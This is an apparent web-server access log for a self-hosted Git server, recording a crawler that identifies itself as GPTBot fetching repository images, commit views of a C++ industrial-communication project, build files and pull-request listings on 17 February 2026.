"/windpacer/homepage/_delete/main/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/ControlRoom3.png" -[17/Feb/2026:17:40:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/html/assets/images/ControlRoom3.png" -[17/Feb/2026:17:40:50 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/ControlRoom4.png" -[17/Feb/2026:17:40:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/html/assets/images/ControlRoom4.png" -[17/Feb/2026:17:40:50 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/ControlRoom6.png" -[17/Feb/2026:17:40:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/html/assets/images/ControlRoom6.png" -[17/Feb/2026:17:40:51 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/ControlRoom5.png" -[17/Feb/2026:17:40:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/html/assets/images/ControlRoom5.png" -[17/Feb/2026:17:40:51 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/html/assets/images/ControlRoom7.png" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/ControlRoom7.png" -[17/Feb/2026:17:40:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/html/assets/images/ControlRoom7.png" -[17/Feb/2026:17:40:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 846] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/ControlRoom2.png" -[17/Feb/2026:17:40:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 1774975] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/ControlRoom5.png" -[17/Feb/2026:17:40:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 2082919] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/ControlRoom1.png" -[17/Feb/2026:17:40:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 846] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/ControlRoom1.png" -[17/Feb/2026:17:40:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 2483659] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/ControlRoom2.png" -[17/Feb/2026:17:40:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 846] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/ControlRoom4.png" -[17/Feb/2026:17:40:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 846] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/ControlRoom6.png" -[17/Feb/2026:17:40:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/html/assets/images/ControlRoom7.png" [Client 74.7.227.38] [Length 873] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/ControlRoom7.png" -[17/Feb/2026:17:40:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 2102057] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/ControlRoom6.png" -[17/Feb/2026:17:40:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 846] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/ControlRoom3.png" -[17/Feb/2026:17:40:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 846] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/ControlRoom5.png" -[17/Feb/2026:17:40:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 1851586] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/ControlRoom4.png" -[17/Feb/2026:17:40:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/Project%20Planning-1.md?display=source" [Client 74.7.227.38] [Length 36196] [Gzip 8.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/Project%20Planning-1.md" -[17/Feb/2026:17:40:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/Project%20Planning-1.md?display=source" [Client 74.7.227.38] [Length 36195] [Gzip 8.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/Project%20Planning-1.md" -[17/Feb/2026:17:41:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/Project%20Planning-1.md?display=source" [Client 74.7.227.38] [Length 36196] [Gzip 8.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/Project%20Planning-1.md" -[17/Feb/2026:17:41:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/Project%20Planning-1.md?display=source" [Client 74.7.227.38] [Length 36196] [Gzip 8.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/Project%20Planning-1.md" -[17/Feb/2026:17:41:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/Project%20Planning-1.md?display=source" [Client 74.7.227.38] [Length 36194] [Gzip 8.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/Project%20Planning-1.md" -[17/Feb/2026:17:41:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&milestone=-1&state=closed&type=all" [Client 74.7.227.38] [Length 9998] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&milestone=-1&state=all&type=all" -[17/Feb/2026:17:41:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=rendered" [Client 74.7.227.38] [Length 11065] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:17:41:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=source" [Client 74.7.227.38] [Length 11841] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:17:41:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=rendered" [Client 74.7.227.38] [Length 11062] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:17:41:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=rendered" [Client 74.7.227.38] [Length 11064] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:17:41:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make?display=rendered" [Client 74.7.227.38] [Length 11161] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" -[17/Feb/2026:17:41:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make?display=rendered" [Client 74.7.227.38] [Length 11153] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" -[17/Feb/2026:17:41:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make?display=source" [Client 74.7.227.38] [Length 11304] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" -[17/Feb/2026:17:41:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make?display=rendered" [Client 74.7.227.38] [Length 11157] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" -[17/Feb/2026:17:41:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make?display=rendered" [Client 74.7.227.38] [Length 11150] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" -[17/Feb/2026:17:41:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts?display=rendered" [Client 74.7.227.38] [Length 11161] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" -[17/Feb/2026:17:41:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake?display=rendered" [Client 74.7.227.38] [Length 11163] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" -[17/Feb/2026:17:41:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make?display=source" [Client 74.7.227.38] [Length 11324] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" -[17/Feb/2026:17:41:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make?display=source" [Client 74.7.227.38] [Length 11325] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" -[17/Feb/2026:17:41:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make?display=rendered" [Client 74.7.227.38] [Length 11152] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" -[17/Feb/2026:17:41:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake?display=rendered" [Client 74.7.227.38] [Length 11160] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" -[17/Feb/2026:17:41:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make?display=rendered" [Client 74.7.227.38] [Length 11159] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" -[17/Feb/2026:17:41:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts?display=rendered" [Client 74.7.227.38] [Length 11161] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" -[17/Feb/2026:17:41:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make?display=source" [Client 74.7.227.38] [Length 11300] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" -[17/Feb/2026:17:41:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make?display=source" [Client 74.7.227.38] [Length 11301] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" -[17/Feb/2026:17:41:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/codec.hpp?display=source" [Client 74.7.227.38] [Length 13140] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/codec.hpp" -[17/Feb/2026:17:41:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/modbus_tcp.cpp?display=rendered" [Client 74.7.227.38] [Length 11017] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/modbus_tcp.cpp" -[17/Feb/2026:17:41:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&state=all&type=all" [Client 74.7.227.38] [Length 9982] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?milestone=-1&state=all&type=all" -[17/Feb/2026:17:41:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html?display=rendered" [Client 74.7.227.38] [Length 11221] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" -[17/Feb/2026:17:41:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 9787] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/ControlRoom1.png" -[17/Feb/2026:17:41:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 9786] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/ControlRoom4.png" -[17/Feb/2026:17:41:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 9786] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/ControlRoom6.png" -[17/Feb/2026:17:41:15 +0000] - 200 200 - 